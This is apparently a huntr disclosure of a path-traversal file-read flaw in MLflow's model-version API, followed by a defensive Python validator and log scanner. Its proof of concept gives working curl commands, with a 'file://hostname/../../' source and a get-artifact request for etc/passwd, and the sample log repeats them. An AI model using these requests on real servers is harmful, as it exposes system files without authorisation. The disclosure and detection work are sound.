huntr report 7B5D130D-38EB-4133-8C7D-0DFC9A9D9896
Reported: Apr 20, 2023, 6:40 p.m.

LFI in Model Version REST API creation

2023-04-20 18:40:34
Reporter: benwilson2
www.huntr.dev

Tags: lfi, model version, rest api, local server, file access

EPSS: 0.012
Percentile: 85.7%

Description

By creating a model version through the REST API endpoint api/2.0/mlflow/registered-models/create and passing a relative-path redirection in the source argument, local files on the tracking server can be read when a subsequent REST API v1.1 call to model-versions/get-artifact supplies any path on the local file system.

Proof of Concept

Start an MLflow server in default mode

mlflow server

Use the REST API to create a model

curl -X POST http://mlflowserver:5000/api/2.0/mlflow/registered-models/create -H "Content-type: application/json" -d '{"name": "AModel"}'

Use the REST API to create a model version, setting the source argument to a relative path (such as root) on the local file system.
(Note that this is not restricted to the 'file://' URI scheme. It also works with 'http://', 'https://', 'runs:/', 'mlflow-artifacts:/' and object store locations, provided that the host is not 'localhost' or '127.0.0.1'.)

curl -X POST http://mlflowserver:5000/api/2.0/mlflow/model-versions/create -H "Content-type: application/json" -d '{"name": "AModel", "source": "file://hostname/../../../../../../../"}'

Retrieve the artifacts from the tracking server’s local filesystem

curl "http://mlflowserver:5000/model-versions/get-artifact?path=etc/passwd&name=AModel&version=1"

This will return the file contents of the local password file.
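Added example, not code from this report or from the MLflow project: a defender-side check for the two steps above. The first function validates a model-version source URI the way a tracking server could before accepting it (traversal segments rejected in every scheme, local paths confined to an allowlisted artifact root, loopback hosts refused for remote schemes, consistent with the host restriction noted above). The second function scans access-log lines, flags create calls whose source fails validation, and then flags any get-artifact call for a model name that was tainted that way. The allowlist root, the log line layout and the sample lines are constructed assumptions for illustration.

```python
"""Defensive checks for the model-version source traversal described above.
Added example; not MLflow's own code.
Assumptions (constructed): one allowlisted local artifact root and a simple
access-log line format of the form
  <ip> - <METHOD> <path>[?query] [body=<json>]
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist of local directories artifacts may be served from.
ALLOWED_LOCAL_ROOTS = ("/srv/mlflow/artifacts",)
# Remote/indirect schemes the checker understands; anything else is rejected.
REMOTE_SCHEMES = {"http", "https", "runs", "mlflow-artifacts", "s3", "gs", "wasbs"}
# Hosts that would point a "remote" source back at the tracking server itself.
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1", "0.0.0.0"}


def _has_traversal(path: str) -> bool:
    """True if the path contains a '..' segment (either separator style)."""
    return ".." in path.replace("\\", "/").split("/")


def is_safe_source(source: str, allowed_roots=ALLOWED_LOCAL_ROOTS) -> bool:
    """Accept a source only if it stays inside an allowed local root or names a
    non-loopback remote location, and never carries traversal segments."""
    parts = urlsplit(source)
    scheme = parts.scheme.lower()
    if scheme in ("", "file"):
        # file://<host>/... puts the host in netloc; only empty or loopback is local.
        if parts.netloc and parts.netloc.lower() not in LOOPBACK_HOSTS:
            return False
        raw = parts.path or source
        if _has_traversal(raw):
            return False
        resolved = posixpath.normpath(raw)
        return any(resolved == root or resolved.startswith(root.rstrip("/") + "/")
                   for root in allowed_roots)
    if scheme in REMOTE_SCHEMES:
        if parts.hostname and parts.hostname.lower() in LOOPBACK_HOSTS:
            return False
        return not _has_traversal(parts.path)
    return False


SOURCE_RE = re.compile(r'"source"\s*:\s*"([^"]*)"')
NAME_RE = re.compile(r'"name"\s*:\s*"([^"]*)"')


def suspicious_requests(log_text: str):
    """Return (line_no, reason) pairs: create calls with an unsafe source, and
    get-artifact calls for a model name whose version was created that way."""
    findings = []
    tainted = set()  # model names whose version source failed validation
    for n, line in enumerate(log_text.splitlines(), 1):
        if "/model-versions/create" in line:
            src = SOURCE_RE.search(line)
            name = NAME_RE.search(line)
            if src and not is_safe_source(src.group(1)):
                findings.append((n, "unsafe model-version source"))
                if name:
                    tainted.add(name.group(1))
        elif "/model-versions/get-artifact" in line and "?" in line:
            query = line.split("?", 1)[1].split()[0]
            name = parse_qs(query).get("name", [""])[0]
            if name in tainted:
                findings.append((n, "artifact read via tainted model version"))
    return findings


# Constructed sample log (not real MLflow output); lines 1-2 mirror the PoC flow.
SAMPLE_LOG = """\
10.0.0.5 - POST /api/2.0/mlflow/model-versions/create body={"name":"AModel","source":"file://hostname/../../../../../../../"}
10.0.0.5 - GET /model-versions/get-artifact?path=etc/passwd&name=AModel&version=1
10.0.0.9 - GET /model-versions/get-artifact?path=model/MLmodel&name=Prod&version=3
10.0.0.9 - POST /api/2.0/mlflow/model-versions/create body={"name":"Prod","source":"mlflow-artifacts:/1/abc/artifacts/model"}
"""

if __name__ == "__main__":
    for line_no, reason in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {reason}")
```

The get-artifact request on its own looks ordinary (the path has no '..' in it), which is why the detection keys on the earlier create call: the traversal lives in the stored source, so the create event is where validation and alerting have to happen.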
